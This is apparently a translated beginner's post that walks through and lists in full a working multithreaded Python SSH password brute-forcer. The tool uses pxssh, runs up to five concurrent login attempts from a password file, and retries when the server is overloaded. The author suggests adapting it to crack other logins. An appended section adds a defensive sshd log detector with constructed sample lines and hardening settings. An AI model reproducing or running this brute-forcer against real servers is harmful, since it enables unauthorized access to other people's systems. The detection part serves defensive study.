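1. Start multiple threads (after t.start() the main thread keeps running; t.join() waits for the child thread to finish).
2. Fails records the number of read_nonblocking failures and pxssh command-prompt extraction failures.
3. maxConnections is the maximum number of connections (with multithreading, a single CPU is actually just switching between the threads...).
How the code is put together:
main() function
1. Parse the arguments.
2. Loop over the password file (5 threads are opened to connect; threads make this faster because the connection is remote and the code blocks while waiting on the network, so multithreading speeds things up).
3. Connect to the SSH server with the username and password.
    s=pxssh.pxssh()
    s.login(host,user,password)
There are three possible outcomes:
The login succeeds.
An exception is raised. There are three kinds; two of them occur because the SSH server has been flooded with connections, or because pxssh has trouble obtaining the command prompt. In both of these cases the connection can be retried after a short wait. Once this timeout error has happened five times, the script can be run again manually later.
The code: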
from threading import Thread, BoundedSemaphore
from time import sleep
from pexpect import pxssh
import sys
import getopt

maxConnections=5
Found=False
# At most maxConnections login attempts may be in flight at once
connect_lock=BoundedSemaphore(value=maxConnections)
Fails=0

def connect(host,user,password,release):
    global Fails
    global connect_lock
    global Found
    try:
        s=pxssh.pxssh()
        #print user
        #print password
        #print "host" +str(host)
        #print "user"+str(user)
        #print "password"+str(password)
        s.login(host,user,password)
        print '[+] password Found'+password
        Found=1
    except Exception,e:
        if "read_nonblocking" in str(e):
            # Server is overloaded: count the failure, wait, then retry
            Fails+=1
            sleep(5)
            connect(host,user,password,False)
        elif 'synchronize with original prompt' in str(e):
            # pxssh could not get the command prompt: wait, then retry
            sleep(1)
            connect(host,user,password,False)
    finally:
        # Only the outermost call releases the semaphore slot
        if release:
            connect_lock.release()

def usage():
    print "ssh boom"
    print "-h host"
    print "-u username"
    print "-p destination passwordfile"

def main():
    host=None
    user=None
    password=None
    if not len(sys.argv[1:]):
        usage()
    try:
        opts,args=getopt.getopt(sys.argv[1:],'u:p:h:')
    except getopt.GetoptError as err:
        print str(err)
        usage()
        exit(0)
    for o,a in opts:
        if o == "-u":
            user=a
        elif o == "-h":
            host=a
        elif o == "-p":
            password=a
        else:
            usage()
    if host==None or password==None or user==None:
        usage()
        exit(0)
    fn=open(password,'r')
    for line in fn.readlines():
        #print "hello"
        if Found:
            print "[*] Exiting: Password Found"
            exit(0)
        if Fails>5:
            print "[!] Exiting :Too Many Socket Timeouts"
            exit(0)
        # Blocks here while maxConnections attempts are already running
        connect_lock.acquire()
        passwd=line.strip('\r').strip('\n')
        print "[-] Testing: " +str(passwd)
        t= Thread(target=connect,args=(host,user,passwd,True))
        t.start()

if __name__=='__main__':
    main()
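Tested by this beginner: adding threads really did make it a lot faster.
Summary: for network operations like this, or any other process that blocks, using threads can give a several-fold speedup. Cracking other username/password logins can be written on top of this, and it should be much faster than Burp.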
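Seen from the server, the script above produces a distinctive pattern in the sshd log: a burst of "Failed password" entries from one source address, up to five in flight at a time. The following is an added example (Python 3, not part of the original post) that flags such bursts and any successful login that follows one; the log lines are constructed, and the threshold, window and year are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH syslog format (not from the original post)
SAMPLE_LOG = """\
Mar 10 10:00:01 srv sshd[2101]: Failed password for root from 203.0.113.7 port 40001 ssh2
Mar 10 10:00:01 srv sshd[2102]: Failed password for root from 203.0.113.7 port 40002 ssh2
Mar 10 10:00:01 srv sshd[2103]: Failed password for root from 203.0.113.7 port 40003 ssh2
Mar 10 10:00:02 srv sshd[2104]: Failed password for root from 203.0.113.7 port 40004 ssh2
Mar 10 10:00:02 srv sshd[2105]: Failed password for root from 203.0.113.7 port 40005 ssh2
Mar 10 10:00:04 srv sshd[2106]: Failed password for root from 203.0.113.7 port 40006 ssh2
Mar 10 10:00:09 srv sshd[2107]: Accepted password for root from 203.0.113.7 port 40007 ssh2
Mar 10 10:03:00 srv sshd[2110]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Mar 10 10:03:08 srv sshd[2111]: Accepted password for alice from 198.51.100.20 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return alerts as (kind, source_ip, user, timestamp) tuples.

    threshold, window and year are assumed values; syslog lines carry no year.
    """
    recent = defaultdict(deque)   # source ip -> timestamps of recent failures
    flagged = set()               # source ips that already crossed the threshold
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, result, user, ip = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        q = recent[ip]
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user, ts))
        elif ip in flagged:
            # A login that succeeds after a guessing burst needs urgent review
            alerts.append(("success_after_bruteforce", ip, user, ts))
    return alerts
```

A single mistyped password followed by a successful login (the `alice` lines) stays below the threshold and raises nothing. On the sshd side, the `MaxAuthTries` and `MaxStartups` settings in sshd_config limit attempts per connection and concurrent unauthenticated connections.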